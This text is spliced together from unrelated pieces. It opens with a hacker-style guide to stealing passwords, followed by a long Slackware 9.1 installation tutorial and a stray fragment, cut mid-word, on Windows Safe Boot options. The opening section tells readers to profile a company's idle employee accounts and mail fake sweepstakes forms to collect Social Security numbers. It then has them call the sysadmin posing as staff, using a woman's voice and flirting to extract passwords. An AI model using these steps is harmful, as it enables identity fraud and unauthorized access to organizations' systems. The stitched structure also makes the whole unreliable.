You want to see what your school's minutes are or you want to hack a local chemical company to see their new toxins, but even if you had access it would be problematic to access the passwords because they are running a VAX. Now what? First you get a list of employees. For schools, just use the catalog. For companies, use a live engineering technique. Look for payroll sheets, or posted employee lists. If you look right, you can just ask a low level employee for a list. Remember, be calm in front of people. You have to maintain your credibility. Finger each employee's account. Find out who has or hasn't used their account in the past few months. Those who haven't are your marks. Write those names down cause your gonna play them for all they are worth, goddammit. Now we go to the phone book and get the employees addresses. Then we create a document in our DTP program that emmulates a short sweepstakes form or another short document commonly encountered in the field. It must look professional but subtle enough not to look false. Credibility once again. Remember to include the social security number space as well as other information. Send these out and wait or masturbate or whatever you do for a few days. Yes, you're going to have to spend $10 on stamps unless you are on good terms with who you engineered in person. If they trust you, go back and use the stamping machine..might as well. Now get your phone and call their sysadm. Use women voices first because the guys that run these machines have rarely seen daylight, let alone women. They are EASILY manipulated with a woman's voice. Sound helpless, they love it. If they don't give you your password, you'll have plenty of info for them for verification. If you pretend to be a woman, they'll give youplenty of leway. Go as far as saying you've seen them at work and think they are cute. Watch the passwords fly. Installing Slackware Linux

Installing Slackware Linux

(Post #1)

Slackware Linux is one of the oldest Linux distributions remaining. Over the years, it has stayed true to its roots and form.

Here's what the author, Patrick Volkerding has to say about it.

http://www.slackware.com/info/

The Slackware Philosophy

Since its first release in April of 1993, the Slackware Linux Project has aimed at producing the most "UNIX-like" Linux distribution out there. Slackware complies with the published Linux standards, such as the Linux File System Standard. We have always considered simplicity and stability paramount, and as a result Slackware has become one of the most popular, stable, and friendly distributions available.

What's this about "friendly"? You heard that Slackware was too damned hard, didn't you? If you are expecting cute graphical wizards and penguins automating every configuration step for you, that may be true. However, in essense, Slackware is one of the simplest distributions there is if you are proficient with a Linux system. If you aren't, a little perseverance with Slackware and you will be.

The reason it is easy for an experienced user is, first of all the init scripts and configuration files are easy to follow. They are generally well commented and it's easy to make changes using an ordinary text editor.

Not only that, you are getting the full, complete, standard releases of software in this distribution, installed in a sane manner. The way the developers intended. Therefore, when you go to install additional software not provided by the distribution vendor, you don't run into as many snags.

The packaging system in Slackware is quick, dirty and simple too. Slackware packages (.tgz files) are basically just tar.gz archives, that have install scripts that the packaging utilities execute. No dependency checking, which can be good or bad, depending on how you look at it. To me it's good, because I don't get annoyed by packages that won't install because of some brain dead mechanism that checks for things in specific places. The catch is, you need to be a bit careful installing system software.

Slackware also provides an excellent environment for building your own software from sources.

I could go on at length about why you should give Slackware an honest try but I'll let you follow this guide and see for yourself. We are going to be installing Slackware 9.1, which is the latest release at the time of writing.

Starting the Installation

First of all, if you intend to dual boot with Windows, take care of that first. If you're starting with a fresh hard disk, create a partition for Windows, and leave the rest unallocated (unpartitioned). Install Windows first.

Boot with the first disk in the Slackware CD set. (or the first CD that you created from the ISO files you downloaded).

If your computer is unable to boot from the CDROM for whatever reason, it is also possible to create a floppy boot disk set for the installation. Read the file README.TXT in the bootdisks directory on the Slackware CD, as well as the rootdisks directory. In Slackware 9.1, this directory is on the first CD.

Once you boot with the installation media, this is the first screen you will see:

Most people with plain IDE systems, can just hit enter here, to load the bare.i kernel image. The README.TXT in the bootdisks directory, describes the precompiled kernel images available on the Slackware CD. If you have SCSI disks, you must read that file, because adaptec.s, scsi.s, scsi2.s and scsi3.s each contain drivers for different SCSI controllers.

So press Enter to load bare.i, or type the name of the kernel image you wish to load (e.g. scsi.s)

The kernel will boot, and then you will be instructed to log on as root.

Just type root and hit enter. You will not be prompted for a password at this time.

Now we must partition the disk. This is probably the trickiest part of Slackware Setup, for there are no point and click partitioning utilities provided. We are going to use the Linux Fdisk utility. It seems scary at first, a bit alien, but it's very easy to operate and you're unlikely to make mistakes if you follow the steps correctly, and do not write the tables to disk until you're sure. I have never had a mishap with this program, and it has never damaged any existing (Windows) partition table entries on the disk.

What I did here was, I hooked up a new Western Digital 40 Gb hard disk for this install. I booted with the Windows XP CD and during setup, created an 8 Gb partition, formatted it NTFS and blasted a quick Windows XP install on there so we can have a dual boot. I left the rest of the disk unallocated.

Fdisk must be invoked with the device name of the hard disk you wish to partition. In this case, we're using the primary master hard disk, so we use the /dev/hda devicename. Here is how IDE disks are named:

/dev/hda - Primary Master /dev/hdb - Primary Slave /dev/hdc - Secondary Master

/dev/hdd - Secondary Slave

Note that these do not refer to partitions or filesystems, but the hard disk devices themselves. (/dev/hda1, /dev/hda2 and so on, is how partitions are addressed)

SCSI disks are named /dev/sda, /dev/sdb, /dev/sdc and so on, according to which are first enumerated on the bus.

We need to type fdisk /dev/hda

Don't worry about the informational message about the number of cylinders. Unless you're installing a very old Linux distribution, the boot loader won't have a problem.

Now what? Press m to see a list of commands.

The first thing we want to do is press p to print (display) the partition table. We do this after every step, so we can see the results. Nothing is really changed, until we press w to write the partition table to disk.

There's our 8 Gb NTFS partition, /dev/hda1. The first partition on the disk, and in Windows terms, the active partition. It's going to stay that way.

The units (for Start and End) are in cylinders of 8225280 bytes. Just remember that each unit is rougly 8 megabytes (7.84 if you do the math). It's also displayed in blocks of rougly 1 kb. Don't worry about it, we will be specifying partition sizes in megabytes.

Now, how we partition depends greatly on personal preference. All you really need to install and run Linux is a root partition, and a swap partition. However, that's a fairly large chunk of disk and we can mount parts of the Linux filesystem on separate partitions.

This is basically how I would allocate this space, for use with Slackware. It's just the way I do things, you can choose other partitioning schemes and sizes. If disk space is tight, you should create only a root partition, and save some space for a swap partition. For example, if you have 4 Gb of space to allocate, create a 3.7 Gb root partition and use the rest for swap. That would be a half decent setup.

Using multiple partitions is a bit wasteful, because we have to allow room on each partition for growth. This may result in some disk space staying unused. Err on the side of caution, and allocate plenty of space.

This is what I would do for my own use:

1 Gb root partition (primary partition) The root filesystem, contains system software and libraries, configuration data (/etc), local state data (/var) and all other filesystems are mounted under it.

Extended partition utilizing the rest of the disk We then create logical drives on the extended partition.

1 Gb swap partition (logical drive) Note that you probably don't need a swap partition that large but I like the extra insurance and I have plenty of space. It allows me to work on absolutely huge files, and provides extra memory addressing in the event of some sort of race condition. 256 Mb should probably be enough swap though, if disk space is tight.

8 Gb partition for /usr (logical drive) Most all of your software and libraries get installed in /usr. It is useful to have a large partition for this.

2 Gb partition for /opt (logical drive) "Optional" software can be installed here. For example, KDE will be installed to /opt/kde. I install some other software to /opt as well.

18 Gb (roughly) for /home (logical drive) We use what is leftover, for /home. This is where the user directories are, and where users will store personal files. You may also install some software to /home if desired. I do, and I keep build directories there as well.

Now, we will start creating these partitions.

To create a new partition, press n

We are prompted to choose primary, or extended. We want to create a primary partition here. (though the root partition could be a logical partition on the extended)

Press p to create a primary partition.

We then have to give it a partition number. The Windows XP partition is already partition 1, so we have to choose 2

We are then prompted for the starting cylinder. We will be just hitting enter, to accept the default value. (the first available cylinder). We will be accepting the default starting cylinder for each partition we create. We will specify the ending cylinder, by specifying the size in megabytes. For the value of "last cylinder", we type +1024M to create a partition of roughly 1 gigabyte. Partitions have to end on a cylinder boundary (or waste sectors), and partitioning software automatically adjusts that.

Now, press p to display the partition tables, and you'll see what you've done so far. At this point, if you've made a mistake, simply press d and type the partition number that you want to delete (2 in this case... just don't touch partition 1 or you'll destroy Windows). Nothing has been written yet, you can just delete the partition you've created and repeat the last step. This is why we view the partition info at every step. If satisfied, proceed with the next step. At the command prompt, you can press q at any time to quit without writing anything to disk, if you've made a serious mistake and just want to start over.

Now we are going to create an extended partition, to act as a container for our logical drives.

Press n to create a new partition then press e to choose extended. Press 3 when prompted for the partition number and it will be designated as /dev/hda3. We will never be accessing this partition, just the logical drives we are going to create on it.

Note: How the partition numbers work is, partitions 1 to 4 are reserved for primary partitions. (the extended partition is considered a primary partition). It is an architectural limitation of PC BIOS partition tables, that only 4 primary partitions are allowed on a disk. You can have many logical drives though. Logical drives start being numbered at 5, in the Linux scheme.

Press enter when prompted for the first cylinder, to accept the default of the next available.

When prompted for the last cylinder, this time, simply press enter again. It will allocate the rest of the disk, ending at the last cylinder 4865.

Press p to display the partition tables.

Now we are going to create logical drives until we've used up the extended partition, starting with swap. I generally like to put swap in between the root partition and /usr.

You know the drill. Press n to create a new partition, but this time press l for logical. (In our case, we can't create any more primary partitions because we've already allocated the disk)

Note that we are not prompted to choose a partition number for a logical drive, as it will be assigned 5 as the first one.

Press enter to accept the default value of the first cylinder. For the last cylinder, I'll type +1024M to create a 1 Gb partition.

Press p to display the partition table, and note that our new partition is /dev/hda5. There will be no /dev/hda4, because there will be no more primary partitions on this disk.

Aside: Just so you understand how this works, let's say that when we created the extended partition, we didn't allocate the rest of the disk. We left some space unallocated. If we were to create a primary partition using that space now or some time in the future, it would become /dev/hda4.

OK, now, note the Id column in the display of the partition table. By default, when we create partitions they are of type 83, Linux Native.

We must change the partition type of the one we just created to 82, Linux Swap.

Press t to "change a partition's system id" and then press 5 when prompted for the partition number. (Following my partitioning scheme, that is. Use the correct number for your swap partition of course)

When prompted for the Hex Code (partition ID), if you were to press L, you would see a long list of possible partition types that the Linux fdisk utility is aware of.

Type 82 for Linux Swap, and hit enter. When you press p to display, you will see the change.

The rest of the partitions we'll create, will be the default type 83, Linux.

Press n to create a new partition. Choose l for logical. Press enter to accept the default first cylinder. For the last cylinder, type +8192M to create an 8 Gb partition for /usr.

Again, n for a new partition, and l for logical. Press enter for the first cylinder. For the last cylinder, type +2048M to create a 2 Gb partition for /opt.

Now, we'll allocate the last partition for /home.

When asked for the first and last cylinders, just press enter for both of those this time, as we're using up the extended partition.

If satisfied with your changes, press w to write the partition table to disk, and exit the Linux fdisk utility.

If you see a warning like that, restart the system (with the slackware CD). I am seeing that message, because I altered the partition tables on a live system (to get those screenshots easily), but I have seen similar warnings when writing the partition tables to disk if I've gone back and redone them after already writing. You should just see "Calling ioctl() to re-read partition table", and "Syncing Disks". You only need to reboot if there were warnings.

Note: I said I altered the partition tables on a live system. That means, the data on those partitions was effectively lost. The next reboot would have been oblivion. Not a problem because it was just a test install, and I planned to install the OS again (Slackware installs very quickly), but know that you can't adjust partitions on the fly, as the partitions must be formatted afterwards.

Take note of which partition devices you created to correspond with your mount points. You'll need to specify them, during setup.

Now we are ready to proceed with the Slackware installation.

Now that we have our Linux partitions created, at the root prompt we can type setup

This is the main setup menu. You can read the help if you like, but you can just skip down to ADDSWAP unless you need to remap your keyboard for some reason. Use the arrow keys to navigate, and enter to select.

It will detect your swap partition for you, format it (mkswap) and activate it (swapon)

Note: The hard disk devices in these screenshots are /dev/sda. Don't pay any attention to that, it's just because I took these screenshots from within a virtual machine. It emulates disks as scsi devices. Just know that's not the disk we partitioned in the examples above, so there's no confusion.

After completing a step, setup automatically takes you to the next step in sequence. Next, is to select the target partitions. Here is where we choose our root partition, and then choose mount points for the other partitions.

This is where we select our root partition (/). Following our partitioning example, that would be /dev/hda2.

Now it will prompt you to format the partition. I would choose to check for bad blocks while it's formatting.

Choose your desired filesystem. I like to use ext2 because it's a simple filesystem that's well matured, but you may want to choose ext3 to have a journaling filesystem.

Now it prompts to choose the inode density for the filesystem. Just hit enter to go with the default of 4096 unless you know what you are doing, and specifically why you want to do it.

If you just created a root partition and swap, you are done formatting now. If you created other partitions, they must now be selected, formatted and assigned mount points.

Swap doesn't show up in this list.

We are mounting this partition as /usr.

Continuing on, we are prompted to select, assign mount points and format the rest of our partitions in the same manner.

When finished, a summary is displayed

In the next step, you will be prompted to select the source media.

Hit enter to choose a Slackware CDROM, and it should detect it automatically.

In the next step, we are prompted to select package categories.

These govern which series of packages will be installed on the system. By default, all categories are selected except KDEI (KDE i18N internationalization). If you're just going to be using English/Western charsets you don't need to install KDEI.

For your first time installing Slackware, I recommend leaving all package categories enabled. You can just choose OK here.

Next, we are prompted to choose the "prompt mode", that is, the degree of interaction for installing packages.

Full, installs all packages in the categories you've selected, without prompting. This is what I recommend for your first Slackware install. Install everything, and you can easily remove packages you don't want later after you get a feel for things. I do know what I'm doing, but this is the option I normally use. It's just easier.

Newbie prompts for each package as they are being installed. I do not recommend this, as it is quite tedious. Also, you may not know what you want/need yet.

Menu is a bit better, as it lets you choose groups of related things.

Expert. If you know what you are doing, the expert prompt mode is an excellent way to choose exactly which packages you want installed on the system, prior to package installation. This really is good, it's not terribly confusing like similar package installation modes in other distributions.

The custom/tagfile options use tagfiles to automate a custom package selection. I've never used them. This would be handy if you were wanting to roll out the same installation on several machines though.

Choose full and watch the packages install non-interactively. It won't take very long, even on a relatively slow machine.

At some point during the package installation, you will be prompted to insert the second CD.

When the package installation stage completes, you are prompted to choose a kernel.

I recommend the CDROM option, and choosing the same kernel that you chose at the initial boot prompt when you booted with the Slackware CD. It got you this far.

Because I did these screenshots in a virtual machine that uses scsi emulation for the virtual disks, I had to choose scsi.s. On an IDE system, you probably either want bare.i or bareacpi.i (warning: acpi can cause boot problems if your BIOS implementation of ACPI doesn't jibe... this is why I recommend using the same kernel you chose at the initial boot prompt)

Next, you are prompted to create an emergency boot disk.

I highly recommend taking the time to create this disk, for it can be used to start the distribution if anything ever happens to your boot loader. You will be able to easily fix it, if you can start the system using this boot floppy.

You will now be prompted to create a symbolic link for your modem device.

If you have a modem, you can do that here. Saying "no modem" doesn't mean you can't use a modem, you can create the /dev/modem symbolic link later, or just use the appropriate device (e.g. /dev/ttyS1 for COM2)

Next, you will be prompted to enable the hotplug system. If you have such devices, say Yes, otherwise No is a good idea.

As you can see, it's possible for it to cause problems on some systems. Note the information on how to get out of the trap if it happens to you.

Now we are prompted to install the LILO bootloader.

You will most likely want to choose simple here. Choosing expert, will result in lilo not behaving as you expect and you'll have to manually edit the lilo.conf file (or run liloconfig from within the OS) to get the desired functionality back (e.g. it won't even prompt you to select an operating system). If you choose to skip the installation of lilo altogether, then you will only be able to boot into your Slackware system using the boot floppy that you created in the previous steps.

Next, you are prompted to choose the VGA (display) mode of your console, either standard VGA, or one of the VESA framebuffer display modes. The reason this is in the lilo configuration, is because the boot loader passes these parameters to the kernel on boot.

It is nice to have a framebuffer console for when you're not running XFree86, but if the framebuffer mode you've chosen doesn't work well with your display hardware, you could end up with an unusable display (until you fix it of course... you could boot with your boot floppy).

Consider choosing standard for now, to use standard VGA. You can change this parameter in your /etc/lilo.conf file later. If you're always going to be using the XFree86 GUI environment, it's not going to matter much anyways.

You are now prompted to enter any extra boot parameters, that lilo is to pass to the kernel.

He gives one very common example of why you might need to do this: If you have an IDE CD Writer. In the 2.4 kernel series, CD writing uses SCSI emulation and the kernel must know which drive is to use that mode, if both IDE-CD Support and IDE-SCSI support are to be loaded in the running kernel. The example of hdc, is for a secondary master. Use hdd if your writer is secondary slave.

Next, you are prompted to choose the destination for installing LILO. You will almost certainly want to choose MBR (unless you know what you are doing)

He says "possibly unsafe" because there are a few situations where writing to the master boot record is indeed unsafe. For example, if your bios doesn't support the capacity of the drive, and you have translation software installed (e.g. "MaxBlast" or "EZBios"). Another reason it could be unsafe is, if you are using another boot loader (e.g. System Commander, or Boot Magic). Also, before you ever write to the MBR (installing pretty much any OS), you must ensure that bios level MBR protection is disabled. (a.k.a boot virus protection, or "Trend ChipAway"). Installing LILO to the MBR, is the most common way that it is used and it is normally quite safe and can be used to start your Windows operating systems as well.

The "Root" option, to install LILO to the superblock of your root partition, is mainly useful if you intend to use another boot manager to invoke LILO.

Next, you are prompted to create a symbolic link for your mouse.

Even if you don't intend to use gpm, it's still useful to have a correct /dev/mouse symbolic link. This way you can just specify that device when you configure XFree86 after the OS is installed. I choose imps2 for my Logitech ps/2 wheel mouse.

I don't have much use for this (it's got nothing to do with using a mouse in the GUI), but if you wish to have mouse support at the console, you can load gpm at boot time.

At this point, you will be asked if you want to Configure your network. If you only have dial up networking, and don't even have a NIC, you can say No to that question for now, and you'll be prompted to configure your clock, timezone and set a root password. Alternatively you can proceed, and choose loopback. That is really what you should do, as then at least you'll set a hostname for the machine.

If you chose to configure your network now, the first thing you will be prompted for is a hostname. Enter something.

Now you'll be prompted to enter a domain name.

If you intend to participate as a member of a network that has a nameserver, you will want to enter your fully qualified domain name, ending in .com, .org, .edu or similar.

Otherwise just enter localdomain. In subsequent steps you can even remove that domain name. (That's what I do, for I don't really need to have one)

Next, you will be prompted to set up your computer's IP address.

If your network adapter connects to a cable modem, or a broadband router, or uses a PPPoE connection (PPP Over Ethernet... commonly used for ADSL Internet connections), then you probably want to choose DHCP to have your TCP/IP info automatically assigned.

If you choose DHCP, you will be prompted for a DHCP hostname. If you connect directly to a cable modem, you may need to specify your user ID here.

Otherwise, just leave it blank and hit enter.

Next, setup will prompt you to probe for your network adapter.

If it doesn't detect it, don't panic. It just means you'll have to figure out which kernel module your network adapter needs and configure the network later.

Ok, in this virtual machine, that's the virtual adapter it detects. It works. However, on the real Slackware installation, it doesn't automatically detect my D-Link 530TXS. Not a problem, because I know what kernel module it needs (sundance.o). That's something for later and we'll cover it then. It doesn't prevent us from configuring most of the network information though.

If you've chosen to use DHCP, a confirmation screen is what you'll see next. Your network configuration steps are completed.

Myself, I just configure my network statically, and I don't use the DHCP server on my router. So, if you choose Static IP instead of DHCP, this is how the configuration goes.

Enter your IP Address.

Enter your Subnet Mask

Enter your Default Gateway

Enter a Nameserver

Note: I'm just entering the IP address of my router here, it acts as a DNS proxy. The Primary and Secondary DNS servers of my ISP are entered in my router's WAN configuration. You will probably want

to enter your ISP's Primary DNS server in this field, and then you can add more nameservers (e.g. the secondary) to your /etc/resolv.conf file later.

Now you will be prompted to confirm your network settings.

You can edit these settings from this dialog as well. For example, I want to remove the domain name "localdomain" altogether.

This concludes the network portion of setup.

After the network configuration, you will be prompted to configure your startup services.

Many of these are network server daemons, and if you are just using your computer as a workstation, you will want to leave most all of them disabled. You may want things like the CUPS print server.

Next, you will be prompted to configure your clock and timezone.

Next, you will be prompted to choose a default window manager, for when you start XFree86.

If you are new to Linux, select KDE for now, you can try some of the others later.

Now you're prompted to enter a root password.

Say Yes. You'll be prompted to type a root password twice, for confirmation.

Slackware setup is now complete. You will be prompted to exit setup and press ctrl-alt-del to reboot your machine.

After exiting, the CDROM tray will open, so you can remove the CD. You'll be back at the root prompt after that. Press ctrl-alt-del to restart the system, and boot Slackware for the first time!

When the system cycles, you'll be at the LILO boot prompt. This is still the virtual machine, but in the real installation on the IDE disk we partitioned, liloconfig didn't add my Windows boot choice to the lilo.conf file. So what I see is exactly the same. Probably because I used the NTFS filesystem. We'll be fixing that up soon, it's not difficult.

Hit enter to start Slackware Linux, and you'll be at the logon prompt. Type root as the username, and you will be prompted for the root password you set near the end of setup.

The first thing you should probably do, is create a user for yourself. You must not use the root user account for normal operation of the system. The Slackware adduser script makes this very easy, by interactively prompting you for information instead of making you supply it with switches on the command line.

Type adduser as root, and then you will be prompted to enter a username. Use lower case for the username.

For most of the prompts you will just want to hit enter to accept the defaults unless you have a specific reason. Let it default to the next available user ID, hit enter to use /bin/bash (unless you want to use another shell of course), accept the default home directory, and accept the default of no expiry date.

You may want to enter a "full name" (I like to pick something humorous). You will then be prompted to type the user's password twice for confirmation. A user can change his own password any time, using the passwd command.

The rest of the configuration steps can really be done in any order, according to what is most important to you. You may want to get the XFree86 GUI started first, so you can use GUI based text editors and such, if you're unfamiliar with working from the command line.

The first thing I'd want to do is get my network going (if it isn't already). The netconfig utility that ran during setup, could not probe for my network adapter. However, I know that it uses the sundance module. How did I know that? Well, when I first bought those NICs, I typed D-Link 530TXS Linux (the "S" is significant in the model number) into a search engine (Google) and found the tidbit I needed in mailing list archives and the like.

Now, during setup we configured our network with the exception of the driver module for the network adapter. That means, all we have to do is load the module, and start the network. Slackware's startup scripts look for a script file named rc.netdevice in the /etc/rc.d directory. This is where the system init scripts are located on Slackware system. (It uses the BSD style init script mechanism)

It is very easy to create this file from the command line. As root, type:

echo "/sbin/modprobe sundance" > /etc/rc.d/rc.netdevice

This will redirect the output of the echo command into the specified text file that will get created. The quotes are important, because there is a space in the string we are echoing. Use the correct module name for your network adapter, of course.

Now, set the file executable:

chmod 755 /etc/rc.d/rc.netdevice

That's it, on the next reboot your network should initialize.

Alternatively, to load a network adapter module, you could uncomment the appropriate module loading line (or add one) in the /etc/rc.d/rc.modules init script.

Now, I don't feel like rebooting at the moment, so I'm going to just type a few simple commands to start the network.

I'm loading the module, then using the ifconfig utility to specify the interface, IP address of the machine, and subnet mask, and then using the route command to specify my router as the gateway.

You probably will want to attempt to start the XFree86 GUI now. By default, Slackware is set up to use the VESA Framebuffer driver for your display hardware. The /etc/X11/XF86Config file is a copy of the file XF86Config-vesa in the same directory.

So if you type startx you may have a usable GUI if the settings are compatible with your display hardware. That will do in a pinch, but you will want to properly configure XFree86 and use the accelerated driver for your video card (which hopefully exists, otherwise you've got some generic options)

I put the XFree86 configuration for Slackware in a separate tutorial, which you can read here:

Configuring XFree86 in Slackware (Opens in new window)

Next, I want to get LILO straightened around, so I can boot that Windows XP installation. At this point I have no way of starting it.

As root, open the /etc/lilo.conf file with a text editor. I drew a box around the section that I added, to the bottom of the file.

Lines that start with # are comments, and are ignored.

This is called "chainloading". What we are doing, is instructing LILO to pass control over to whatever code is in the /dev/hda1 partition's boot sector. It does not have to know anything about the filesystem or the operating system on the partition. In this case, that's the code in the boot sector that finds ntldr; Windows XP's own boot loader. Any additional Windows operating systems that the Windows XP boot loader's boot.ini file is configured to start (e.g. Win9x) will be available from the ntldr menu as well.

What you will see in the LILO boot menu, is the label windows.

While you are editing lilo.conf, you probably will want to change the timeout to a more reasonable value. It defaults to 1200, which is 2 minutes. (The value is in 10ths of a second, so a value of 300 is 30 seconds)

After you are finished editing the lilo.conf file, you must run the lilo command (or /sbin/lilo if /sbin isn't in your path) to rewrite the changes, or they will have no effect.

As root, type lilo and you should see in the output that it has added both Linux and windows to the configuration.

I rebooted the machine, and I can start both Linux and windows.

If you ever want to access that NTFS filesystem from within Linux (read-only support for NTFS), you will have to load the ntfs kernel module, and mount the filesystem.

Create a mount point (an empty directory)

mkdir /mnt/windows

Load the kernel module.

modprobe ntfs

Mount the filesystem.

mount -t ntfs /dev/hda1 /mnt/windows

You access it from /mnt/windows.

Slackware 9.1 ships with the ALSA (Advanced Linux Sound Architecture) system. I had never really used it before, beyond manually loading ALSA kernel drivers without having any of the utilities installed. It's considerably more complex than the older OSS (Open Sound System) drivers, requiring more kernel modules and module aliases to be set up in a modules.conf file. I thought I was going to really hate it, but when I saw how easy it was to configure, I had to re-evaluate that.

As root, type alsaconf and a curses based configuration utility will appear.

It probes for your sound card.

Offers to set up your modules.conf file for you.

Some nice informational messages.

That should be it, your audio should now work!

If that doesn't work for you, then it will be manual configuration. Check the Alsa Soundcard Matrix to see if your card is supported, and what module to use.

http://www.alsa-project.org/alsa-doc/

As for configuration, this is what you'll want to put in your /etc/modules.conf file. The lines should pretty much be the same for all sound cards, but what you must change is the driver module, which I have shown in bold.

quote: # Stuff for the kernel module loader alias char-major-116 snd alias char-major-14 soundcore # Your Driver alias snd-card-0 snd-ens1371 alias sound-slot-0 snd-card-0 # OSS Emulation alias sound-service-0-0 snd-mixer-oss alias sound-service-0-1 snd-seq-oss alias sound-service-0-3 snd-pcm-oss alias sound-service-0-8 snd-seq-oss alias sound-service-0-12 snd-pcm-oss

Some cards may need additional modules or options. See the "details" section for your card, at the Alsa Soundcard Matrix.

ndows in its normal mode. Reboot: This option restarts the computer. Return to OS Choices Menu: On a computer that is configured to starting to more than one operating system, this option returns to the Boot menu. An environment variable is set when you use one of the Safe Boot options. The environment variable is SAFEBOOT_OPTION. This variable is set to either Network or to Minimal.

The default Microsoft VGA driver is used for display at 640 x 480 resolution and in 16 colors. You must log on in all modes by a domain or by the local Security Accounts Manager, depending on which Safe Boot mode you select.